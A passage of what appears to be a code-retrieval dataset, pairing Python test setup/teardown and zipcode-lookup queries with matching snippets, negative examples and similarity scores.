favorite[\"user\"] = request.user.id\n favorite[\"article\"] = article.pk\n serializer = self.serializer_class(data=favorite)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n article_serializer = ArticleSerializer(\n instance=article, context={'request': request})\n data = dict(article=article_serializer.data)\n data[\"article\"][\"favorited\"] = True\n data[\"message\"] = \"favorited\"\n return Response(data, status.HTTP_200_OK)" ]
[ "0.72114295", "0.6636154", "0.6632463", "0.65658706", "0.64831656", "0.6482696", "0.6476188", "0.64745235", "0.6445702", "0.6381491", "0.6374218", "0.6319528", "0.6261317", "0.6236881", "0.6179164", "0.6172634", "0.6163744", "0.6161769", "0.6146276", "0.6124457", "0.60840327", "0.6082842", "0.6063424", "0.6043306", "0.6040604", "0.60332847", "0.60214037", "0.6017845", "0.5996445", "0.59783953", "0.59630066", "0.59426045", "0.5907134", "0.5890616", "0.5873086", "0.58557093", "0.5843716", "0.5838309", "0.5833724", "0.58273315", "0.58217096", "0.58204156", "0.57307446", "0.57043576", "0.56848633", "0.5684691", "0.56819737", "0.56725836", "0.5670301", "0.5669386", "0.56667906", "0.56558275", "0.56395274", "0.5638145", "0.56235874", "0.56175506", "0.5587593", "0.55795", "0.55683464", "0.5561002", "0.5560598", "0.55406415", "0.553992", "0.5533672", "0.55330646", "0.55322725", "0.552966", "0.5528444", "0.5528023", "0.55215436", "0.5520078", "0.55152476", "0.5507108", "0.54975736", "0.5497368", "0.5484245", "0.54831713", "0.5466831", "0.5453766", "0.54491746", "0.54470766", "0.5444997", "0.5444987", "0.54427916", "0.54321253", "0.5427761", "0.54244006", "0.54219854", "0.54069823", "0.53986573", "0.53986573", "0.5396267", "0.53886825", "0.5383246", "0.53826976", "0.537803", "0.5376038", "0.537137", "0.5369109", "0.5359738" ]
0.78729564
0
Stuff to do before every test.
def setUp(self): # Get the Flask test client self.client = app.test_client() # Show Flask errors that happen during tests app.config['TESTING'] = True # Connect to test database connect_to_db(app, "postgresql:///testdb") # Create tables and add sample data db.create_all() users() reviews() with self.client as c: with c.session_transaction() as sess: sess['user_id'] = 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_run_tests(cls):\n pass", "def do_before(self):\r\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def setUp(self):\r\n # nothing to do, all tests use different things\r\n pass", "def setUp(self):\n print(\"New test by Nikolay Melnik\")", "def beforeTest(self, test):\n self.setupLoghandler()", "def before(self) -> None:\n pass", "def setUp(self):\r\n pass # nothing used by all\r", "def setUp(self):\n pass #because we dont have anything to setup.", "def setUp(self) -> None:\n pass", "def setUp(self) -> None:\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\n pass", "def setUp(self):\r\n pass # nothing required by all\r", "def setUp(self):\n\n pass", "def setUp(self):\n\n pass", "def setUp(self) :\n pass", "def setUp(self):\n\n return", "def setUp(self):\r\n pass", "def setUp(self):\n print('Calling \\'setUp\\'')", "def setUp(self):\n self", "def setUp(self):\n self", "def setUp(self):\n \n pass", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def setUp(self):\n\n BaseTest.setUp(self)", "def startTestHook(self):", "def setUp(self):\n MainTests.setUp(self)", "def setUp(self):\n setUp()", "def setUp(self):\n super(BasicTestCase, self).setUp()", "def setUp(self):\n test_env_setup()", "def setUp_extra(self):\n pass", "def setUp(self):\n print(\"\\nIn setUp()...\")", "def setUp(self):\n\n # ISSUE007\n # TODO, pyunit's bright idea is to call setup before each test. It\n # was defining multiple patterns which was annoying but not a problem.\n # The cleanest way to do things is probably to remove patterns after\n # the test, but we don't have that functionality. For now just create\n # one pattern to avoid confusion, but do it by hacking in a global\n # variable\n\n global firstTime\n\n if not firstTime:\n return\n firstTime = False\n\n # get the full source name for even and odd sources\n out_of_order_numbers = quilt_test_core.get_source_name(\n \"out_of_order_numbers\")\n\n # TODO REad the pattern id from the std output then query that one\n # See ISSUE007 and ISSUE008\n # call quilt_define with the pattern code and name query\n # dups_follows\n quilt_test_core.call_quilt_script('quilt_define.py', ['-n',\n 'out_of_order',\n 'source(\"' + out_of_order_numbers + '\",\"grep\")'])", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_RMT_Util:\", self._testMethodName)", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def XXsetUp(self):\n print(\"FooTest:setUp_:begin\")\n ## do something...\n print(\"FooTest:setUp_:end\")", "def setUpTestCase(self):\n pass", "def setUp(self):\n raise NotImplementedError", "def setUp(self) -> None:\n return super().setUp()", "def setUp(self):\n\n self._set_up()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n self.setup_beets()", "def setUp(self):\n print 'unittest.setUp()'\n pass", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n logging.debug('setting up')", "def setUp(self):\n if not self.flag:\n self.fail(self.err_msg)", "def setUp(self):\n # use self.attribute to keep anything which needs to be accessed later\n print('setUp method\\n')", "def before_each_test(self, request):\n self.test_counter = Counter()\n self.check_ref = request.config.getvalue(\"check_ref\")\n self.create_ref = request.config.getvalue(\"create_ref\")", "def setUp(self):\n super(TestCase, self).setUp()\n self._context = CallContext()", "def on_before_execution(self):\n pass", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n util.create_mocks()", "def setUp(self):\n self.setUpPyfakefs()", "def startTestRun(self):", "def setUp(self):\n assert COMMANDS.keys() == EXPCT_RESULTS.keys()\n self.tests = []\n self.test_numbers = deque(sorted(COMMANDS.keys()))", "def __call__(self, result=None):\n self._pre_setup()\n super(TestCase, self).__call__(result)\n self._post_tearDown()", "def _fixture_setup(self):\n pass", "def test_begin(self):", "def setUp(self):\n self.Reinitialize()", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_ValidParams:\", self._testMethodName)", "def setUp(self):", "def setUp(self):", "def setUp(self):", "def setUp(self):" ]
[ "0.8209909", "0.8028296", "0.80253834", "0.7872079", "0.76552856", "0.76427346", "0.7627397", "0.7540311", "0.7515845", "0.74945575", "0.74945575", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.74365586", "0.7428322", "0.7426078", "0.7426078", "0.7420724", "0.7384354", "0.7378374", "0.7370478", "0.73638576", "0.73638576", "0.7355973", "0.73555076", "0.7353191", "0.73489285", "0.7347254", "0.73437107", "0.7263831", "0.72633225", "0.72391665", "0.7169371", "0.71394217", "0.713784", "0.7133868", "0.7133868", "0.7119319", "0.7118144", "0.71014655", "0.70950025", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.7085565", "0.6989451", "0.6986", "0.6980955", "0.6980955", "0.69528717", "0.69458896", "0.6935865", "0.68862945", "0.68795764", "0.68782437", "0.68782437", "0.68782437", "0.68782437", "0.68782437", "0.68782437", "0.68605286", "0.6854516", "0.68527067", "0.6852522", "0.6850463", "0.68246025", "0.6805653", "0.68054616", "0.6795788", "0.6795788", "0.6795788", "0.6795788" ]
0.0
-1
Do at end of every test.
def tearDown(self): db.session.close() db.drop_all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_finished(self):\n\n # We'll start the next test in an idle, so that the current one is\n # properly terminated, and we do not execute in its context\n\n GLib.idle_add(self._do_test)", "def test_run_ended(self):", "def finished_tests(self):\n self.testing = 0", "def tearDown(self):\n\t\tprint(\"end test\")\n\t\tpass", "def after_test(self, test_results):\n pass", "def endOfTestcase(self):\n pass # nothing to do here. Hence pass statement is called.", "def on_test_end(self, logs=None):", "def after_all(self) -> None:", "def on_test_end(self):\n for callback in self.callbacks:\n callback.on_test_end(self, self.get_model())", "def after_test(self, func, *args, **kwargs):\n pass", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def XXtearDown(self):\n print(\"FooTest:tearDown_:begin\")\n ## do something...\n print(\"FooTest:tearDown_:end\")", "def tearDown(self):\n pass\n # teardown called after each test\n # e.g. maybe write test results to some text file", "def tearDown(self):\n super(TestCase, self).tearDown()\n self._context.check_done()", "def pytest_finished_handling_group(session, worker):", "def after(self):\n pass", "def after(self):\n pass", "def do_after(self):\r\n pass", "def teardown(self) -> None:", "def teardown(self) -> None:", "def teardown(self) -> None:", "def eof(self):\n self.report_scenario_completed()\n self.report_feature_completed()\n self.report_failures()\n self.stream.flush()\n self.reset()", "def teardown(self):", "def teardown(self):", "def teardown(self):", "def finish():\n pass", "def done(self):\n log.debug(\"Test run concluded\")\n if self._startTime is not None:\n self.report['startTime'] = self._startTime\n self.report['runTime'] = time.time() - self._startTime\n self.report['testsRun'] = self.testsRun\n self.report['tests'] = self._tests\n self.writeReport()", "def tearDown(self):\n self.logger.info(\"tearDown begin\")\n self.logger.info(\"tearDown end\\n\")", "def finish(self):\n pass", "def finish(self):\n pass", "def _end(self):\n\n self.logger.msg1(\"Done\")", "def Finish(self):\n pass", "def done(self):", "def done(self):", "def end(self):\n self._log.debug('%s: doing ..', __class__.__name__)\n self._log.debug('%s: done.', __class__.__name__)", "def finish():", "def finish():", "def finish():", "def finish():", "def teardown_method(self):\n world.clear_paths()\n print(\"\\nEnd of tests in: %s\\n-------------------\\n\" % __name__)\n self.bigml = {}", "def finished_tests(self):\n self.testing = 0\n if not self.closing:\n self.enable_menus(1)\n self.parent.finished_tests()", "def teardown(self):\n pass", "def teardown(self):\n pass", "def teardown(self):\n pass", "def end(self):\n ...", "def tearDown(self):\n print('Calling \\'tearDown\\'')", "def end(self):\n self._log.debug('doing ..')\n super().end()\n\n self._log.debug('done')", "def teardown(self):\n pass # pylint: disable=unnecessary-pass", "def finish(self) -> None:", "def finish(self) -> None:", "def after(self) -> None:\n pass", "def afterWork(self):\n pass", "def teardown(self) -> None:\n pass", "def teardown(self) -> None:\n pass", "def finished(self):\n\t\telog(\"finished\")", "def finish(self):", "def finish(self):", "def teardown(self, rc):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(self):\n pass", "def end(c: Composition) -> None:\n c.run(\"testdrive\", \"verify-data.td\")", "def _do_test(self):\n\n process_all_events()\n\n if self.list:\n (callback, args, kwargs) = self.list.pop(0)\n callback(*args, **kwargs)\n else:\n safe_exit(force=1)", "def teardown(self):\n self.tcex.log.trace('teardown')", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def tearDown(self) :\n pass", "def tearDown(self):\n\t\tpass", "def tearDown(self):\r\n self.app.application_close(self.util.client, self.app_name)\r\n\r\n self.common.generate_report(self.util.client, False)\r\n # Releases the client so that other clients can approach the agent in the near future.\r\n self.common.release_client(self.util.client)\r\n self.logger.info(\"==============Results=================\")\r\n self.logger.info(\"Number of Strings verified: \" + str(len(Config.results_list)/2))\r\n for i in range(0, len(Config.results_list), 2):\r\n self.logger.info(str(Config.results_list[i]) + \"{:>36}\".format('=====> ')\r\n + str(Config.results_list[i+1]))\r\n self.logger.info(\"Testcase tear-down: COMPLETED\")", "def _teardown(self):\n # No-op base implementation", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def tearDown(self):\r\n pass", "def clean_up(self) -> None:\n print('Doing some clean-up work...')", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self):\n self.loop.close()", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self) -> None:\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n self.teardown_beets()", "def tearDown(self):\n pass #because we dont have anything to tearDown.", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def end(self) -> None:", "def finish(self):\n if self.failed:\n print \"%s failed. %s of %s assertions passed.\" % (\n self.failed, self.passed, self.failed + self.passed)\n else:\n print \"%s of %s assertions passed.\" % (self.passed, self.passed)\n\n self.failed = self.passed = 0", "def test_teardown(self):\n assert self.search_behaviour.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self):\r\n testing.tearDown()", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def finish(self) -> None:\n self.__exit__(None, None, None)", "def test_teardown(self):\n assert self.http_handler.teardown() is None\n self.assert_quantity_in_outbox(0)", "def tearDown(self) -> None:\n\n logging.info(f\"{'=' * 20}Test completed!{'=' * 20}\")\n logging.info(\"Failed to execute the following parameter combinations: \")\n if self.error_params:\n for each in self.error_params:\n logging.info(each)", "def complete_run():\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass", "def tearDown(self):\n pass" ]
[ "0.78425974", "0.77754915", "0.77742684", "0.7766872", "0.76616216", "0.75920033", "0.7470884", "0.73606", "0.73159856", "0.7297722", "0.7293865", "0.7293865", "0.72588974", "0.7235985", "0.72320426", "0.7224789", "0.7224789", "0.72181326", "0.72043455", "0.72043455", "0.72043455", "0.71976244", "0.7169287", "0.7169287", "0.7169287", "0.71564865", "0.7147801", "0.71392965", "0.7076554", "0.7076554", "0.7069717", "0.7041966", "0.7038115", "0.7038115", "0.70337486", "0.70182955", "0.70182955", "0.70182955", "0.70182955", "0.70081335", "0.7004758", "0.6997527", "0.6997527", "0.6997527", "0.69892746", "0.69694585", "0.69613737", "0.6956021", "0.69547766", "0.69547766", "0.6952943", "0.6912461", "0.6906216", "0.6906216", "0.68874747", "0.6876898", "0.6876898", "0.6872803", "0.68528396", "0.68528396", "0.68528396", "0.684885", "0.6844017", "0.6826692", "0.68262887", "0.68262887", "0.68262887", "0.6800694", "0.67869633", "0.67826825", "0.6779946", "0.6779946", "0.6779946", "0.6779946", "0.6779946", "0.677544", "0.677034", "0.677034", "0.677034", "0.677034", "0.6764208", "0.6764208", "0.6764208", "0.67621267", "0.6758972", "0.67563933", "0.6751442", "0.6749756", "0.67355955", "0.67334735", "0.67305505", "0.67238015", "0.672133", "0.6718853", "0.67131215", "0.6708315", "0.66984904", "0.66984904", "0.66984904", "0.66984904", "0.66984904" ]
0.0
-1
Find restaurant name by zipcode.
def test_process_searchbox_with_mock(self): result = self.client.get('/process_searchbox', data={'zipcode': '94043', 'cuisine': 'indian'}) self.assertIn(b"Dosa Paratha", result.data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def county_name(zipcode): \n search = SearchEngine(simple_zipcode=True) # set simple_zipcode=False to use rich info database\n zipcode_query = search.by_zipcode(str(zipcode))\n zipcode_query_dict = zipcode_query.to_dict()\n county = zipcode_query_dict['county']\n if county is None:\n print('Invalid County')\n else :\n if 'County' in county:\n county = county[:-7]\n if county in county_list:\n print('County is County List')\n print(county)\n return county", "def get_zipsearch(zipcode=u''):\n from x84.bbs import getterminal, LineEditor, echo\n term = getterminal()\n echo(u''.join((u'\\r\\n\\r\\n',\n term.bold_yellow(u' -'),\n term.reverse_yellow(u':'),\n u' ')))\n return LineEditor(width=min(30, term.width - 5), content=zipcode).read()", "def find_one(cls, zipcode ):\n qry = cls.session.query(cls).filter(cls.ZIPCODE.ilike(f'{zipcode}'))\n zc = qry.one()\n return zc", "def find_zip_codes(self, zip_code):\n zip_code = str(zip_code).strip()\n cursor = self.households.find({\"addresses.zip_code\":zip_code})\n results = [Household.from_dict(dct) for dct in cursor]\n\n cursor = self.businesses.find({\"address.zip_code\":zip_code})\n results += [Business.from_dict(dct) for dct in cursor]\n\n return results", "def lookup_usaf_station_by_zipcode(zipcode):\n\n usaf = zipcode_usaf.get(zipcode, None)\n return usaf", "def get_zipcode_names(add):\r\n lng=get_address(add)[1]\r\n lat=get_address(add)[0]\r\n engine = get_sql_engine()\r\n query = text(\r\n \"\"\"\r\n SELECT\r\n code\r\n FROM philly_zipcode\r\n WHERE ST_Intersects(geom, ST_SetSRID(ST_MakePoint(:lng, :lat), 4326))\r\n \"\"\"\r\n )\r\n resp = engine.execute(query,lng=lng, lat=lat).fetchall()\r\n # get a list of names\r\n names = [row[\"code\"] for row in resp][0]\r\n return names", "def get_info_on_postalcode(_, postalcode):\n fourpp = int(postalcode[0:4])\n chars = postalcode[4:6]\n streets = get_streets(fourpp, chars)\n if streets:\n street = streets[0]\n town = street.postcode.city.get_official_name()\n address = street.street\n data = {'found': True, 'address': address, 'town': town}\n else:\n data = {'found': False}\n j = json.dumps(data)\n return HttpResponse(j, content_type='application/json')", "def get_city(zip_code):\r\n\r\n # API key, retrieved from configure.py\r\n api_key = configure.ZIP_KEY\r\n\r\n # API endpoint\r\n url = f'https://www.zipcodeapi.com/rest/{api_key}/info.json/{zip_code}/degrees'\r\n\r\n # API call\r\n response = requests.get(url)\r\n\r\n # Collect response in json format\r\n data = response.json()\r\n\r\n if 'error_code' in data or 'error_msg' in data:\r\n return {\r\n 'success': False,\r\n 'query': zip_code\r\n }\r\n\r\n else:\r\n return {\r\n 'success': True,\r\n 'query': data['zip_code'],\r\n 'city': data['city'],\r\n 'state': data['state'],\r\n 'lat': data['lat'],\r\n 'lon': data['lng']\r\n }", "def searchZipcode(zipcode, jurisdictions):\n try:\n if len(str(zipcode)) != 5:\n return jurisdictions.none()\n\n zipcode = Zipcode.objects.get(code=zipcode)\n j = jurisdictions.filter(geometry__intersects=zipcode.geometry)\n return j\n except Exception as e:\n print(e)\n return jurisdictions.none()", "def get(self, zipcode):\n response = hereService.getWeatherByZipcode(zipcode)\n return response", "def get_zipcode_hospitals(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n hospital_info = text(\r\n \"\"\"\r\n SELECT\r\n\t \"HOSPITAL_NAME\" AS name, \"STREET_ADDRESS\" as address,\r\n \"PHONE_NUMBER\" as contact, geom,\r\n ST_X(geom) AS lon, ST_Y(geom) AS lat\r\n FROM philly_hospital\r\n WHERE \"ZIP_CODE\" = :name\r\n \"\"\"\r\n )\r\n hospitals = gpd.read_postgis(hospital_info, con=engine, params={\"name\": name})\r\n return hospitals", "def match_city(self, city, dpt_code, zip_code = None):\n city = format_str_city_insee(city)\n dpt_code = dpt_code.rjust(2, '0')\n if zip_code:\n zip_code.rjust(5, '0')\n # Based on zip code and city name\n ls_matching = []\n found_indicator = False\n if zip_code:\n if zip_code in self.dict_corr_zip_insee:\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_zip_insee[zip_code]:\n if city == city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'zip_city_match')\n # If no exact zip, city match: check if city name in insee city names\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_zip_insee[zip_code]:\n if city in city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'zip_city_in_match(es)')\n # Based on dpt code and city name\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_dpt_insee[dpt_code]:\n if city == city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'dpt_city_match')\n # If no exact dpt, city match: check if city name in insee city names\n for city_insee, zip_insee, dpt_insee, code_insee in self.dict_corr_dpt_insee[dpt_code]:\n if city in city_insee:\n ls_matching.append((city_insee, zip_insee, code_insee))\n found_indicator = True\n if found_indicator:\n return (ls_matching, 'dpt_city_in_match(es)')\n # No match\n return (None, 'no_match')", "def get_city_by_code(post_code):\n post_code = post_code.replace(' ', '').encode('utf-8')\n error = ''\n city = ''\n opener = urllib2.build_opener()\n url = 'http://maps.googleapis.com/maps/api/geocode/json?address={0}&sensor=false'.format(post_code)\n response = opener.open(url).read()\n response_dict = json.loads(response)\n request_status = response_dict['status']\n if request_status == 'OK':\n logger.debug('Google response')\n logger.debug(response_dict)\n results = response_dict['results']\n \"\"\"\n first get all results\n with required zip code\n \"\"\"\n results_with_required_zip_code = []\n for result in results:\n address_components = result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'postal_code' and address_component['short_name'].replace(' ', '').lower() == post_code.lower():\n results_with_required_zip_code.append(result)\n if not results_with_required_zip_code:\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n # error = 'No location with post code %s' % post_code\n else:\n \"\"\"\n next we need all results in GB\n \"\"\"\n results_with_required_zip_code_in_GB = ''\n for good_result in results_with_required_zip_code:\n address_components = good_result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'country' and address_component['short_name'].lower() == 'GB'.lower():\n results_with_required_zip_code_in_GB = good_result\n if not results_with_required_zip_code_in_GB:\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in GB' % post_code\n else:\n \"\"\"\n finally find city name\n \"\"\"\n address_components = results_with_required_zip_code_in_GB['address_components']\n # first try get postal city\n searching_city = get_city_by_key(address_components, 'postal_town')\n if not searching_city:\n # next by administrative_area_level_2\n searching_city = get_city_by_key(address_components, 'administrative_area_level_2')\n if not searching_city:\n print url\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in GB' % post_code\n else:\n city = searching_city\n elif request_status == 'ZERO_RESULTS':\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n else:\n error = request_status\n return {\n 'error': error,\n 'data': city\n }", "def get_postal_code_by_name(self, name):\n raise NotImplementedError()", "def zillow_query(address, zipcode, key=keys.zillow):\n zillow_data = ZillowWrapper(key)\n deep_search_response = zillow_data.get_deep_search_results(\n address, zipcode)\n result = GetDeepSearchResults(deep_search_response)\n return result", "def compute_zip_code(zip_code_text):\n zip_code = None\n if zip_code_text and len(zip_code_text) >= 5 and zip_code_text.isdigit():\n zip_code = zip_code_text[:5]\n return zip_code", "def main(postalcode):\n places = postalcodes_mexico.places(postalcode)\n click.echo(places)\n return 0", "def patrons_in_zipcode(session, zipcode):\n\n query = {\n 'target': {\n 'record': {\n 'type': 'patron'\n },\n 'id': 80010\n },\n 'expr': {\n 'op': 'equals',\n 'operands': [\n str(zipcode),\n ''\n ]\n }\n }\n\n url = '/patrons/query?offset=0&limit={}'.format(str(api_limit))\n headers = {'content-type': 'application/json'}\n data = json.dumps(query)\n r = session.post(api_url_base + url, data=data, headers=headers)\n entries = json.loads(r.text)['entries']\n record_ids = [x['link'].split('/')[-1] for x in entries]\n return record_ids", "def correct_zipcode(business_tag, zipcode):\n try:\n address = business_tag.find('div', {'class': 'secondary-attributes'}).find('address').text\n zipcode_found = re.search(re.compile('(^|[^\\d])\\d{5}($|[^\\d])'), address).group(0)\n zipcode_found = re.search(re.compile('\\d{5}'), zipcode_found).group(0)\n return zipcode_found == zipcode\n except:\n return False", "def find_places(query):\n parts = str(query).split(' ')\n for i, p in enumerate(parts):\n p = p.replace('-', ' ').strip()\n try:\n postal_code = int(p)\n if len(postal_code) == 4:\n print(postal_code, parts[i+1])\n # Check \n #response = get_osm_location(\"{postal_code} {name}\")\n #lon = response['lon']\n #lat = response['lat']\n #poly = \n except Exception as e:\n continue", "def type_zip_code(self, zip_code):\n\n\t\twith allure.step(\"Type payee zip code\"):\n\t\t\telement = Element(driver=self.driver,\n\t\t\t explicit_wait_time=self.explicit_wait_time,\n\t\t\t locator=BillPayPageLocator.ZIP_CODE_INPUT)\n\t\t\telement.write(zip_code)\n\t\t\treturn None", "def search_using_magento_code(cls, code):\n countries = cls.search([('code', '=', code)])\n\n if not countries:\n return cls.raise_user_error(\n \"country_not_found\", error_args=(code, )\n )\n\n return countries[0]", "def postal_code():\r\n\r\n cursor.execute('SELECT col_1 FROM zipcodes order by RANDOM() limit 1;'\r\n )\r\n return cursor.fetchone()[0]", "def extract_zipcode(full_address):\n full_address = full_address.strip()\n last_space_index = full_address.rindex(\" \")\n zipcode = full_address[last_space_index + 1 : ]\n return zipcode", "def get_postal_zone(self, postal_code: str) -> PostalZone:\n key = postal_code.lower()\n try:\n return self._postal_zones[key]\n except KeyError:\n postal_code = PostalZone(postal_code=postal_code, city=self)\n self._postal_zones[key] = postal_code\n return postal_code", "def get_testing_locations_by_zip():\n\n zip_code = request.args.get('zip_code')\n\n testing_info = get_testing_location_by_zipcode(zip_code)\n data = format_data(d=testing_info, key='test_id')\n\n return jsonify(data)", "def search_address(query: str) -> Tuple[int, str]:\n\n url = 'https://api.n1.ru/api/v1/geo/geocoder/with_cities/'\n params = _search_params.copy()\n params['q'] = query\n\n try:\n r = requests.get(url, params=params, headers=_headers)\n response = r.json()\n\n if not 'result' in response or not response['result']:\n raise NotFoundException('Result not found or empty.')\n \n address = None\n house_number = query.split(',')[-1].strip()\n for x in response['result']:\n if x['name_ru'].lower() == house_number:\n address = x\n break\n \n if address is None:\n raise NotFoundException(f'Not found house number {house_number} in result: {response[\"result\"]}')\n \n return address['street']['id'], address['name_ru']\n except requests.RequestException as e:\n raise ParserException(f'Fail make request. query: {query}') from e\n except NotFoundException as e:\n raise ParserException('Invalid result.') from e\n except (KeyError, IndexError) as e:\n raise ParserException(f'Fail get street id or house number. value: {response[\"result\"]}') from e", "def test_can_lookup_postcode(self):\n postcode_to_lookup = \"SW1A 1AA\"\n os_places_key = self.app.config.get(\"OS_PLACES_API_KEY\")\n addresses = AddressLookup(key=os_places_key).by_postcode(postcode_to_lookup)\n self.assertGreater(len(addresses), 0)\n result_postcode = addresses[0].get(\"DPA\", {}).get(\"POSTCODE\")\n self.assertEqual(result_postcode, postcode_to_lookup)", "def find_in_county(cls, county_code, ma_region, pdp_region, name='*'):\n flter = or_(cls.COUNTY_CODE == county_code,\n cls.MA_REGION_CODE == ma_region,\n cls.PDP_REGION_CODE == pdp_region\n )\n if not name == '*':\n look_for = f\"{name.lower()}%\"\n flter = and_(flter, cls.PLAN_NAME.ilike(look_for))\n\n qry = cls.session.query(Plans.PLAN_NAME).filter(flter).distinct(cls.PLAN_NAME).all()\n results = [r.PLAN_NAME for r in qry]\n return results", "def findLocationByCode(cls, code):\r\n return cls.query.filter_by(code = code).first()", "def geocode_zip():\n\n # Get user location \n zipcode = request.args.get('zipcode')\n location_result = client.geocode(zipcode)\n\n # Save needed geolocation in the session\n session['lat'] = location_result[\"results\"][0][\"location\"][\"lat\"]\n session['lng']= location_result[\"results\"][0][\"location\"][\"lng\"]\n\n city = location_result[\"results\"][0][\"address_components\"][\"city\"]\n state = location_result[\"results\"][0][\"address_components\"][\"state\"]\n session['user_facing_location'] = city + \", \" + state\n\n return jsonify(location_result)", "def lookup(name, phonebook):\n\n phonebook_data = read_phonebook(phonebook)\n\n match = False\n for entry_name in phonebook_data:\n if name.lower() in entry_name.lower():\n match = True\n print entry_name, phonebook_data[entry_name]\n\n if not match:\n print \"No matches found.\"", "def geocode(postcode):\n key = current_app.config.get(\"OS_PLACES_API_KEY\")\n formatted_addresses = FormattedAddressLookup(key=key).by_postcode(postcode)\n response = [{\"formatted_address\": address} for address in formatted_addresses if address]\n return Response(json.dumps(response), mimetype=\"application/json\")", "def get_closest_station_by_zipcode(zipcode):\n\n station_lookup_method_by_zipcode = lookup_usaf_station_by_zipcode(zipcode)\n try:\n station, warnings, lat, lon = _get_closest_station_by_zcta_ranked(zipcode)\n\n isd_metadata = get_isd_file_metadata(str(station))\n if len(isd_metadata) == 0:\n logging.warning(\"Zipcode %s mapped to station %s, but no ISD metadata was found.\" % (zipcode, station))\n return station_lookup_method_by_zipcode\n\n except UnrecognizedUSAFIDError as e:\n logging.warning(\"Closest station %s is not a recognized station. Using backup-method station %s for zipcode %s instead.\" % (\n str(station),\n station_lookup_method_by_zipcode,\n zipcode))\n return station_lookup_method_by_zipcode\n\n except UnrecognizedZCTAError as e:\n logging.warning(\"Unrecognized ZCTA %s\" % e)\n return None\n\n if str(station) != station_lookup_method_by_zipcode:\n logging.debug(\"Previously would have selected station %s instead of %s for zip code %s\" % (\n station_lookup_method_by_zipcode,\n str(station),\n zipcode))\n\n if warnings:\n logging.warning(\"Station %s is %d meters over maximum %d meters (%d meters) (zip code %s is at lat/lon %f, 